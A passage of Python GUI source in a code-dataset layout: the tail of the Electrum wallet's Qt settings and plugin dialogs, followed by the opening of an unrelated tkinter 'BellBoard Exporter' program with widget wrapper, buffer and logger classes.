            self.decimal_point = 5
        elif unit_result == 'bits':
            self.decimal_point = 2
        else:
            raise Exception('Unknown base unit')
        self.config.set_key('decimal_point', self.decimal_point, True)
        self.history_list.update()
        self.receive_list.update()
        self.address_list.update()
        for edit, amount in zip(edits, amounts):
            edit.setAmount(amount)
        self.update_status()
    unit_combo.currentIndexChanged.connect(on_unit)
    gui_widgets.append((unit_label, unit_combo))
    # block explorer
    block_explorers = sorted(block_explorer_info.keys())
    msg = _('Choose which online block explorer to use for functions that open a web browser')
    block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
    block_ex_combo = QComboBox()
    block_ex_combo.addItems(block_explorers)
    block_ex_combo.setCurrentIndex(block_explorers.index(block_explorer(self.config)))
    def on_be(x):
        be_result = block_explorers[block_ex_combo.currentIndex()]
        self.config.set_key('block_explorer', be_result, True)
    block_ex_combo.currentIndexChanged.connect(on_be)
    gui_widgets.append((block_ex_label, block_ex_combo))
    # QR-scanner camera device
    from electrum import qrscanner
    system_cameras = qrscanner._find_system_cameras()
    qr_combo = QComboBox()
    qr_combo.addItem("Default","default")
    for camera, device in system_cameras.items():
        qr_combo.addItem(camera, device)
    #combo.addItem("Manually specify a device", config.get("video_device"))
    index = qr_combo.findData(self.config.get("video_device"))
    qr_combo.setCurrentIndex(index)
    msg = _("Install the zbar package to enable this.\nOn linux, type: 'apt-get install python-zbar'")
    qr_label = HelpLabel(_('Video Device') + ':', msg)
    qr_combo.setEnabled(qrscanner.zbar is not None)
    on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
    qr_combo.currentIndexChanged.connect(on_video_device)
    gui_widgets.append((qr_label, qr_combo))
    # change-address policy
    usechange_cb = QCheckBox(_('Use change addresses'))
    usechange_cb.setChecked(self.wallet.use_change)
    if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
    def on_usechange(x):
        usechange_result = x == Qt.Checked
        if self.wallet.use_change != usechange_result:
            self.wallet.use_change = usechange_result
            self.wallet.storage.put('use_change', self.wallet.use_change)
            # "multiple change" only makes sense when change is in use.
            multiple_cb.setEnabled(self.wallet.use_change)
    usechange_cb.stateChanged.connect(on_usechange)
    usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
    def on_multiple(x):
        multiple = x == Qt.Checked
        if self.wallet.multiple_change != multiple:
            self.wallet.multiple_change = multiple
            self.wallet.storage.put('multiple_change', multiple)
    multiple_change = self.wallet.multiple_change
    multiple_cb = QCheckBox(_('Use multiple change addresses'))
    multiple_cb.setEnabled(self.wallet.use_change)
    multiple_cb.setToolTip('\n'.join([
        _('In some cases, use up to 3 change addresses in order to break '
          'up large coin amounts and obfuscate the recipient address.'),
        _('This may result in higher transactions fees.')
    ]))
    multiple_cb.setChecked(multiple_change)
    multiple_cb.stateChanged.connect(on_multiple)
    tx_widgets.append((usechange_cb, None))
    tx_widgets.append((multiple_cb, None))
    # preview-before-sign
    showtx_cb = QCheckBox(_('View transaction before signing'))
    showtx_cb.setChecked(self.show_before_broadcast())
    showtx_cb.stateChanged.connect(lambda x: self.set_show_before_broadcast(showtx_cb.isChecked()))
    showtx_cb.setToolTip(_('Display the details of your transactions before signing it.'))
    tx_widgets.append((showtx_cb, None))
    # manual fee editing
    can_edit_fees_cb = QCheckBox(_('Set transaction fees manually'))
    can_edit_fees_cb.setChecked(self.config.get('can_edit_fees', False))
    def on_editfees(x):
        self.config.set_key('can_edit_fees', x == Qt.Checked)
        self.update_fee_edit()
    can_edit_fees_cb.stateChanged.connect(on_editfees)
    can_edit_fees_cb.setToolTip(_('This option lets you edit fees in the send tab.'))
    tx_widgets.append((can_edit_fees_cb, None))
    # coin chooser
    def fmt_docs(key, klass):
        # Flatten a chooser class docstring into the help text.
        lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
        return '\n'.join([key, "", " ".join(lines)])
    choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
    chooser_name = coinchooser.get_name(self.config)
    msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
    msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
    chooser_label = HelpLabel(_('Coin selection') + ':', msg)
    chooser_combo = QComboBox()
    chooser_combo.addItems(choosers)
    i = choosers.index(chooser_name) if chooser_name in choosers else 0
    chooser_combo.setCurrentIndex(i)
    def on_chooser(x):
        chooser_name = choosers[chooser_combo.currentIndex()]
        self.config.set_key('coin_chooser', chooser_name)
    chooser_combo.currentIndexChanged.connect(on_chooser)
    tx_widgets.append((chooser_label, chooser_combo))
    # lay the collected widgets out on their tabs
    tabs_info = [
        (tx_widgets, _('Transactions')),
        (gui_widgets, _('Appearance')),
        (id_widgets, _('Identity')),
    ]
    for widgets, name in tabs_info:
        tab = QWidget()
        grid = QGridLayout(tab)
        grid.setColumnStretch(0,1)
        for a,b in widgets:
            i = grid.rowCount()
            if b:
                if a:
                    grid.addWidget(a, i, 0)
                grid.addWidget(b, i, 1)
            else:
                grid.addWidget(a, i, 0, 1, 2)
        tabs.addTab(tab, name)
    vbox.addWidget(tabs)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    # run the dialog
    d.exec_()
    self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
    run_hook('close_settings_dialog')
    if self.need_restart:
        self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def run_network_dialog(self):
    """Open the network dialog, or warn when Electrum is running offline."""
    if self.network:
        NetworkDialog(self.wallet.network, self.config, self).do_exec()
    else:
        self.show_warning(_('You are using Electrum in offline mode; restart Electrum if you want to get connected'), title=_('Offline'))
def closeEvent(self, event):
    """Qt close handler; makes sure cleanup runs exactly once."""
    # closeEvent can, in rare cases, be delivered twice — guard with the
    # cleaned_up flag before tearing anything down.
    if not self.cleaned_up:
        self.cleaned_up = True
        self.clean_up()
    event.accept()
def clean_up(self):
    """Persist window state and shut down wallet/network resources."""
    self.wallet.thread.stop()
    if self.network:
        self.network.unregister_callback(self.on_network)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # Remember geometry only for non-maximized windows.
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
                                              g.width(),g.height()])
    # Keep only the last 50 console commands.
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Show the plugin manager dialog with a toggle per available plugin."""
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    # Lazily-created per-plugin settings widgets, keyed by plugin name.
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        # Enable/disable the plugin and refresh its settings widget.
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        name = descr['__name__']
        p = plugins.get(name)
        # Wallet-type plugins are managed elsewhere; skip them here.
        if descr.get('registers_wallet_type'):
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            cb.setEnabled(plugins.is_available(name, self.wallet))
            cb.setChecked(p is not None and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # A broken plugin must not take down the whole dialog.
            self.print_msg("error: cannot display plugin", name)
            traceback.print_exc(file=sys.stdout)
    grid.setRowStretch(i+1,1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def show_account_details(self, k):
    """Show name, type, derivation and master public keys of account *k*."""
    account = self.wallet.accounts[k]
    d = WindowModalDialog(self, _('Account Details'))
    vbox = QVBoxLayout(d)
    name = self.wallet.get_account_name(k)
    label = QLabel('Name: ' + name)
    vbox.addWidget(label)
    vbox.addWidget(QLabel(_('Address type') + ': ' + account.get_type()))
    vbox.addWidget(QLabel(_('Derivation') + ': ' + k))
    vbox.addWidget(QLabel(_('Master Public Key:')))
    text = QTextEdit()
    text.setReadOnly(True)
    text.setMaximumHeight(170)
    vbox.addWidget(text)
    # One master public key per line (multisig accounts have several).
    mpk_text = '\n'.join( account.get_master_pubkeys() )
    text.setText(mpk_text)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
|
BellBoardExporter.py | import tkinter as tk
from tkinter import DISABLED, NORMAL, END
from tkinter import filedialog
from tkinter import ttk
import os
from platform import system
import sys
import threading
from threading import Thread
import queue
import requests
from PyPDF2 import PdfFileReader, PdfFileMerger
import io
class Text():
    """
    The Text class, a custom class that wraps around a new instance of a
    tkinter Text widget.

    The widget is created, optionally seeded with *startingText*, set
    read-only, and placed on *frame* with grid().
    """
    def __init__(self, frame, startingText=None, width=None, height=None,
                 background="grey",
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        self.startingText = startingText
        self.width = width
        self.height = height
        self.background = background
        self.padx = padx
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.info_text = tk.Text(frame, cursor="",
                                 bg=self.background, width=self.width, height=self.height)
        # Fix: the default startingText is None, and ``None + "\n"``
        # raised a TypeError; only insert when text was actually given.
        if self.startingText is not None:
            self.info_text.insert(END, self.startingText + "\n")
        # Read-only: the widget is for display, not user input.
        self.info_text.config(state=DISABLED)
        self.info_text.grid(column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan, padx=self.padx, pady=self.pady)
class Label():
    """
    The Label class, a custom class that wraps around a new instance of a tkinter Label widget.

    All construction options are kept as attributes; the wrapped widget is
    created and placed on *frame* with grid() immediately.
    """
    def __init__(self, frame, font, text=None,
                 foreground="black", background="white",
                 width=None, height=None,
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        # Remember every option so it can be inspected later.
        self.text = text
        self.font = font
        self.foreground = foreground
        self.background = background
        self.width = width
        self.height = height
        self.padx = padx
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.sticky = sticky
        self.label = tk.Label(frame, text=self.text, font=self.font,
                              highlightbackground=self.background, fg=self.foreground, bg=self.background, width=self.width, height=self.height)
        self.label.grid(padx=self.padx, pady=self.pady,
                        column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
                        sticky=self.sticky)

    def update(self, text):
        """
        Update the value of the Label to the specified value, text.
        """
        self.label.configure(text=text)
class LabelFrame():
    """
    The LabelFrame class, a custom class that wraps around a new instance of a tkinter LabelFrame widget.

    All construction options are kept as attributes; the wrapped widget is
    created and placed on *frame* with grid() immediately.
    """
    def __init__(self, frame, font, text=None,
                 foreground="black", background="white",
                 width=None, height=None,
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        # Remember every option so it can be inspected later.
        self.text = text
        self.font = font
        self.foreground = foreground
        self.background = background
        self.width = width
        self.height = height
        self.padx = padx
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.sticky = sticky
        self.label = tk.LabelFrame(frame, text=self.text, font=self.font,
                                   highlightbackground=self.background, fg=self.foreground, bg=self.background, width=self.width, height=self.height)
        self.label.grid(padx=self.padx, pady=self.pady,
                        column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
                        sticky=self.sticky)

    def update(self, text):
        """
        Update the value of the LabelFrame to the specified value, text.
        """
        self.label.configure(text=text)
class Entry():
    """
    The Entry class, a custom class that wraps around a new instance of a
    tkinter Entry widget, and keeps both a sanitised (URL-escaped, as used
    on BellBoard) and an unsanitised copy of its value.
    """
    def __init__(self, frame, textVariable="", sanatiseEntry=True, width=None, state="normal",
                 foreground="black", background="white",
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        self.sanatiseEntry = sanatiseEntry
        self.width = width
        # Fix: these assignments previously ended with stray trailing commas
        # (e.g. ``self.state = state,``), which silently turned each value
        # into a one-element tuple before it was handed to tkinter.
        self.state = state
        self.foreground = foreground
        self.background = background
        self.padx = padx
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.sticky = sticky
        self.entryValue = textVariable
        self.unsanatisedEntryValue = textVariable
        self.entry = tk.Entry(frame, textvariable=self.entryValue, width=self.width, state=self.state,
                              highlightbackground=self.background, foreground=self.foreground, background=self.background)
        self.entry.grid(padx=self.padx, pady=self.pady,
                        column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
                        sticky=self.sticky)

    def sanatise(self):
        """
        Sanatise the current Entry value to match what's used on BellBoard.
        """
        if self.sanatiseEntry == True:
            self.entryValue = self.entryValue.replace(" ", "+")
            self.entryValue = self.entryValue.replace("*", "%2A")
            self.entryValue = self.entryValue.replace("/", "%2F")

    def update(self):
        """
        Update the variable that holds the Entry value to the currently given value within the Entry
        and create both sanatised and unsanatised versions of it.
        """
        self.entryValue = self.entry.get()
        self.unsanatisedEntryValue = self.entryValue
        self.sanatise()

    def get(self, sanatise=True):
        """
        Update the variable that holds the Entry value to the currently given value within the Entry,
        sanatise it if specified to, and return the value.
        """
        self.update()
        if sanatise == True:
            return self.entryValue
        elif sanatise == False:
            return self.unsanatisedEntryValue
        else:
            print('Error: Entry.get() option "sanatise" needs to be either a bool value or type None')

    def set(self, textVariable):
        """
        Set the value of the Entry to the given value, textVariable.
        """
        self.entryValue = textVariable
        self.unsanatisedEntryValue = self.entryValue
        self.entry.delete(0, END)
        self.entry.insert(0, textVariable)
        self.sanatise()

    def print(self):
        """
        Print the current value of the Entry.
        """
        print(self.entryValue)
class Checkbutton():
    """
    The Checkbutton class, a custom class that wraps around a new instance of a
    tkinter Checkbutton widget, backed by a tk.BooleanVar.
    """
    def __init__(self, frame, tag=None, text=None, checkState=False, state="normal",
                 foreground="black", background="white",
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        # NOTE(review): `state` is accepted but never applied to the widget
        # here; BBOption.updateState() toggles widget state afterwards.
        self.tag = tag
        self.text = text
        self.foreground = foreground
        self.background = background
        self.padx = padx
        # Bug fix: a stray trailing comma previously stored pady as a 1-tuple.
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.sticky = sticky
        self.chk_state_var = tk.BooleanVar(value=checkState)
        self.checkbox = tk.Checkbutton(frame, text=self.text, variable=self.chk_state_var,
                                       onvalue=True, offvalue=False,
                                       highlightbackground=self.background, foreground=self.foreground, background=self.background,
                                       command=self.cb)
        self.checkbox.grid(padx=self.padx, pady=self.pady,
                           column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
                           sticky=self.sticky)
    def cb(self):
        """
        Log the new value whenever the Checkbutton is toggled.
        """
        if self.tag is None:
            print("Check state variable is", self.chk_state_var.get())
        else:
            print("{} is {}".format(self.tag, self.chk_state_var.get()))
    def get(self):
        """
        Get the current (bool) value of the Checkbutton.
        """
        return self.chk_state_var.get()
    def set(self, value):
        """
        Set the value of the Checkbutton.
        """
        self.chk_state_var.set(value)
class Button():
    """
    The Button class, a custom class that wraps around a new instance of a tkinter Button widget.
    """
    def __init__(self, frame, options, tag=None, text=None, state="normal",
                 foreground="black", background="white", command=None,
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        # NOTE(review): `options` is stored but unused here, and `state` is
        # accepted but never applied to the widget; BBOption.updateState()
        # toggles widget state afterwards.
        self.tag = tag
        self.options = options
        self.text = text
        self.command = command  # optional callable run on click
        self.foreground = foreground
        self.background = background
        self.padx = padx
        # Bug fix: a stray trailing comma previously stored pady as a 1-tuple.
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.sticky = sticky
        self.button = tk.Button(frame, text=self.text, highlightbackground=self.background, background=self.background, foreground=self.foreground,
                                command=self.clicked)
        self.button.grid(padx=self.padx, pady=self.pady,
                         column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
                         sticky=self.sticky)
    def clicked(self):
        """
        Run the given command (if any) when the Button is clicked.
        """
        if self.command is not None:
            self.command()
class Combobox():
    """
    The Combobox class, a custom class that wraps around a new instance of a
    tkinter ttk.Combobox widget (read-only), defaulting to the first option.
    """
    def __init__(self, frame, tag=None, menuOptions=None, width=None, state="normal",
                 foreground="black", background="white",
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        # Bug fix: a stray trailing comma previously stored tag as a 1-tuple,
        # which dropdown_callback then had to unwrap with self.tag[0] (and
        # carried an unreachable length warning for it).
        self.tag = tag
        self.menuOptions = menuOptions
        self.width = width
        self.foreground = foreground
        self.background = background
        self.padx = padx
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.sticky = sticky
        self.menuValue = tk.StringVar()
        self.menuValue.set(self.menuOptions[0]) # default value
        self.combobox = ttk.Combobox(frame, textvariable=self.menuValue, values=self.menuOptions, width=width, state='readonly')
        self.combobox.configure(background=self.background, foreground=self.foreground)
        self.combobox.bind("<<ComboboxSelected>>", self.dropdown_callback)
        self.combobox.grid(padx=self.padx, pady=self.pady,
                           column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
                           sticky=self.sticky)
    def get(self):
        """
        Returns the currently selected Combobox value.
        """
        return self.menuValue.get()
    def dropdown_callback(self, selected=None):
        """
        Log the Combobox value when it is changed to a new value.
        `selected` is the (unused) tkinter event object.
        """
        print("{} set to {}".format(self.tag, self.menuValue.get()))
class BrowseButton():
    """
    A Button wrapper that opens a file/directory dialog when clicked and
    remembers the chosen path in self.fileName.

    browseType selects the dialog: "browsePath" -> choose a directory,
    "selectFile" -> choose a save-file name (extension stripped).
    """
    def __init__(self, frame, options, tag=None,
                 browseType="browsePath", text="", startingFileName="", title="",
                 command=None,
                 state="normal",
                 width=None, foreground="black", background="white",
                 padx=0, pady=0,
                 column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        self.options = options
        self.tag = tag
        self.browseType = browseType
        self.text = text
        self.fileName = startingFileName  # current path; also the dialog's initialdir
        self.title = title
        self.extraCommand = command  # optional callback run with the new path
        self.state = state
        self.width = width
        self.foreground = foreground
        self.background = background
        self.padx = padx
        self.pady = pady
        self.column = column
        self.row = row
        self.columnspan = columnspan
        self.rowspan = rowspan
        self.sticky = sticky
        #self.fileTypes = (("PDF Files", "*.pdf"), ("CSV Files", "*.csv"), ("All Files", "."))
        if self.browseType == "browsePath":
            self.clickedFunction = self._askDirectory
        elif self.browseType == "selectFile":
            self.clickedFunction = self._selectFile
        else:
            print("Error: incorrect browseType passed into BrowseButton")
        self.button = Button(frame, options, tag=self.tag, text=self.text,
                             background=self.background, foreground=self.foreground,
                             command=self.clickedFunction,
                             state=self.state,
                             padx=self.padx, pady=self.pady,
                             column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan, sticky=self.sticky)
    def _askDirectory(self):
        """Open a directory chooser; store the result with a trailing separator."""
        # Bug fix: the cancel result ("" or, on some platforms, an empty tuple)
        # is now checked *before* os.path.join, which raised TypeError on a tuple.
        selected = filedialog.askdirectory(initialdir=self.fileName, title=self.title)
        if selected and not isinstance(selected, tuple):
            self.fileName = os.path.join(selected, "")
            if self.extraCommand != None:
                self.extraCommand(self.fileName)
            print("Directory Selected: {}".format(self.fileName))
    def _selectFile(self):
        """Open a save-file dialog; store the chosen name without its extension."""
        fileNameTmp = filedialog.asksaveasfilename(initialdir=self.fileName, title=self.title)#, filetypes=self.fileTypes)
        if fileNameTmp != "" and not isinstance(fileNameTmp, tuple):
            self.fileName = fileNameTmp
            # Strip the extension; the downloader appends .pdf/.csv itself.
            if "." in self.fileName:
                self.fileName = self.fileName.split(".", 1)[0]
            if self.extraCommand != None:
                self.extraCommand(self.fileName)
            print("File Selected: {}".format(self.fileName))
    def get(self):
        """Return the currently stored path/file name."""
        return self.fileName
class BBOption():
    """
    The BBOption class (BellBoardOption). A class that holds all the tkinter widgets used within the given frame,
    for easy access to each one, and their values etc. Widgets are created via
    the add_* factory methods and stored in per-kind dicts keyed by tag.
    """
    def __init__(self, frame, state, background, fontDefault, pad):
        # frame: parent tkinter frame the widgets are placed in.
        # state: default widget state ("normal"/"disabled") for new widgets.
        # fontDefault: font used when a label is added without an explicit font.
        # pad: dict of padding presets, e.g. pad['x']['small'].
        self.frame = frame
        self.state = state
        self.backgroundColour = background
        # Delete the parameter name so later code can't accidentally use the
        # raw argument instead of self.backgroundColour.
        del background
        self.fontDefault = fontDefault
        self.pad = pad
        # One dict per widget kind, keyed by the caller-supplied tag.
        self.label = {}
        self.entry = {}
        self.checkbox = {}
        self.button = {}
        self.browseButton = {}
        self.combobox = {}
    def updateState(self, state):
        """
        Propagate a new tkinter state ("normal"/"disabled") to every held
        widget. Labels are excluded; they have no interactive state to toggle.
        """
        for ent in self.entry:
            self.entry[ent].entry.config(state=state)
        for chk in self.checkbox:
            self.checkbox[chk].checkbox.config(state=state)
        for btn in self.button:
            self.button[btn].button.config(state=state)
        for btn in self.browseButton:
            # BrowseButton wraps a Button wrapper, hence the double .button.
            self.browseButton[btn].button.button.config(state=state)
        for cbx in self.combobox:
            self.combobox[cbx].combobox.config(state=state)
    def add_label(self, tag, text=None, font=None,
                  width=None, height=None,
                  foreground="black", background=None, padx=None, pady=None,
                  column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        """
        Function to add a tkinter Label to the frame. Does this by creating an instance of the custom Label
        wrapper class. Falls back to the BBOption defaults for font, background
        and padding when not given.
        """
        if font is None:
            font = self.fontDefault
        if background is None:
            background = self.backgroundColour
        if padx is None:
            padx = self.pad['x']['none']
        if pady is None:
            pady = self.pad['y']['none']
        self.label[tag] = Label(self.frame, text=text, font=font,
                                width=width, height=height,
                                foreground=foreground, background=background,
                                padx=padx, pady=pady,
                                column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
    def add_labelFrame(self, tag, text=None, font=None,
                       width=None, height=None,
                       foreground="black", background=None, padx=None, pady=None,
                       column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        """
        Function to add a tkinter LabelFrame to the frame. Does this by creating an instance of the custom LabelFrame
        wrapper class.
        NOTE(review): stored in self.label, so a LabelFrame and a Label sharing
        a tag will overwrite each other - confirm tags are unique across both.
        """
        if font is None:
            font = self.fontDefault
        if background is None:
            background = self.backgroundColour
        if padx is None:
            padx = self.pad['x']['none']
        if pady is None:
            pady = self.pad['y']['none']
        self.label[tag] = LabelFrame(self.frame, text=text, font=font,
                                     width=width, height=height,
                                     foreground=foreground, background=background,
                                     padx=padx, pady=pady,
                                     column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
    def add_entry(self, tag, sanatiseEntry=True, width=None,
                  foreground="black", background="white", padx=None, pady=None,
                  column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        """
        Function to add a tkinter Entry to the frame. Does this by creating an instance of the custom Entry
        wrapper class.
        """
        if padx is None:
            padx = self.pad['x']['none']
        if pady is None:
            pady = self.pad['y']['none']
        self.entry[tag] = Entry(self.frame, sanatiseEntry=sanatiseEntry, width=width, state=self.state,
                                foreground=foreground, background=background,
                                padx=padx, pady=pady,
                                column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
    def add_checkbox(self, tag, text=None, checkState=False,
                     foreground="black", background=None, padx=None, pady=None,
                     column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        """
        Function to add a tkinter Checkbutton to the frame. Does this by creating an instance of the custom Checkbutton
        wrapper class.
        """
        if background is None:
            background = self.backgroundColour
        if padx is None:
            padx = self.pad['x']['none']
        if pady is None:
            pady = self.pad['y']['none']
        self.checkbox[tag] = Checkbutton(self.frame, tag=tag, text=text, checkState=checkState,
                                         state=self.state,
                                         foreground=foreground, background=background,
                                         padx=padx, pady=pady,
                                         column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
    def add_button(self, tag, options, text=None, command=None,
                   foreground="black", background=None, padx=None, pady=None,
                   column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        """
        Function to add a tkinter Button to the frame. Does this by creating an instance of the custom Button
        wrapper class.
        """
        if background is None:
            background = self.backgroundColour
        if padx is None:
            padx = self.pad['x']['none']
        if pady is None:
            pady = self.pad['y']['none']
        self.button[tag] = Button(self.frame, tag=tag, options=options, text=text, command=command,
                                  state=self.state,
                                  foreground=foreground, background=background, padx=padx, pady=pady,
                                  column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
    def add_browseButton(self, tag, options, text=None, startingFileName=None, browseType="selectFile",
                         command=None,
                         background=None,
                         padx=None,
                         pady=None,
                         column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        """
        Function to add a BrowseButton (a Button that opens a file/directory
        dialog) to the frame. Note: `tag` is used only as the dict key here;
        it is not forwarded to the BrowseButton itself.
        """
        if background is None:
            background = self.backgroundColour
        if padx is None:
            padx = self.pad['x']['none']
        if pady is None:
            pady = self.pad['y']['none']
        self.browseButton[tag] = BrowseButton(self.frame, options, text=text, startingFileName=startingFileName, browseType=browseType,
                                              command=command,
                                              state=self.state,
                                              background=background,
                                              padx=padx,
                                              pady=pady,
                                              column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
    def add_combobox(self, tag, menuOptions=None, width=None,
                     foreground="black", background=None, padx=None, pady=None,
                     column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
        """
        Function to add a tkinter Combobox to the frame. Does this by creating an instance of the custom Combobox
        wrapper class.
        """
        if background is None:
            background = self.backgroundColour
        if padx is None:
            padx = self.pad['x']['none']
        if pady is None:
            pady = self.pad['y']['none']
        self.combobox[tag] = Combobox(self.frame, tag=tag, menuOptions=menuOptions, width=width,
                                      state=self.state,
                                      foreground=foreground, background=background, padx=padx, pady=pady,
                                      column=column, row=row, columnspan=columnspan, rowspan=rowspan,
                                      sticky=sticky)
class Menu():
    """
    The Menu class: builds the application's menu bar with a single
    File -> Exit entry that destroys the root window.
    """
    def __init__(self, root):
        # Build the menu bar and its File drop-down, then attach both to root.
        menu_bar = tk.Menu(root)
        file_menu = tk.Menu(menu_bar)
        file_menu.add_command(label="Exit", command=root.destroy)
        menu_bar.add_cascade(label="File", menu=file_menu)
        root.configure(menu=menu_bar)
        # Preserve the original attribute names for external access.
        self.menu = menu_bar
        self.newMenuItem = file_menu
class Buffer():
    """
    The Buffer class: a minimal file-like object used as a sys.stdout
    replacement. Each written line is stored prefixed with "> ". read()
    snapshots the current length so a later clear() discards exactly the
    portion that was read (anything written in between survives).
    """
    def __init__(self):
        self.buf = ""         # accumulated, "> "-prefixed text
        self.buf_length = 0   # length of buf at the time of the last read()
    def read(self):
        """
        Return the whole buffer, remembering how much was returned so that
        clear() can later drop just that portion.
        """
        self.buf_length = len(self.buf)
        return self.buf
    def flush(self):
        """
        No-op flush, required of file-like objects installed as sys.stdout.
        """
        pass
    def clear(self):
        """
        Discard the portion of the buffer already returned by read().
        """
        self.buf = self.buf[self.buf_length:]
    def write(self, value):
        """
        Append value as a "> "-prefixed line; bare newline writes are dropped.
        """
        if value == "\n":
            return
        self.buf = self.buf + "> " + value + "\n"
class Logger():
    """
    The Logger class: buffers text and periodically appends it to a log file
    using tkinter-style after() scheduling. The after/after_cancel callables
    are injected so the class has no direct tkinter dependency.
    """
    def __init__(self, after, after_cancel, startingText="", logFileName="log.txt", logWriteRate=500, logging=True):
        # after(ms, fn) / after_cancel(id): scheduling callables (tkinter style).
        # logWriteRate: flush interval in milliseconds.
        self.after = after
        self.after_cancel = after_cancel
        self.logFileName = logFileName
        self.logWriteRate = logWriteRate
        self.buffer = startingText
        if self.buffer != "":
            self.buffer += "\n"
        self.logging = logging
        self.after_id = None  # id of the pending scheduled _write, if any
        with open(self.logFileName, "w+"):
            pass # Create/clear the logging file
    def write(self, text):
        """Append text to the pending buffer (flushed by the next _write)."""
        self.buffer += text
    def clear(self):
        """Drop any pending, unwritten buffer contents."""
        self.buffer = ""
    def start(self):
        """Enable logging and flush/schedule immediately."""
        self.logging = True
        self._write()
    def stop(self):
        """Disable logging and cancel the pending scheduled write, if any."""
        self.logging = False
        # Bug fix: guard against stop() being called before start() ever ran,
        # when after_id is still None.
        if self.after_id is not None:
            self.after_cancel(self.after_id)
    def _write(self):
        """Flush the buffer to the log file and reschedule itself."""
        if self.buffer != "" and self.logging == True:
            with open(self.logFileName, 'a') as logFile:
                logFile.write(self.buffer)
                logFile.flush()
            self.clear()
        self.after_id = self.after(self.logWriteRate, self._write)
class BB(tk.Frame):
"""
The BB (BellBoard) class.
"""
def __init__(self, root):
self.programTitle = "Bell Board Exporter - v1.1.0"
if system() == "Windows":
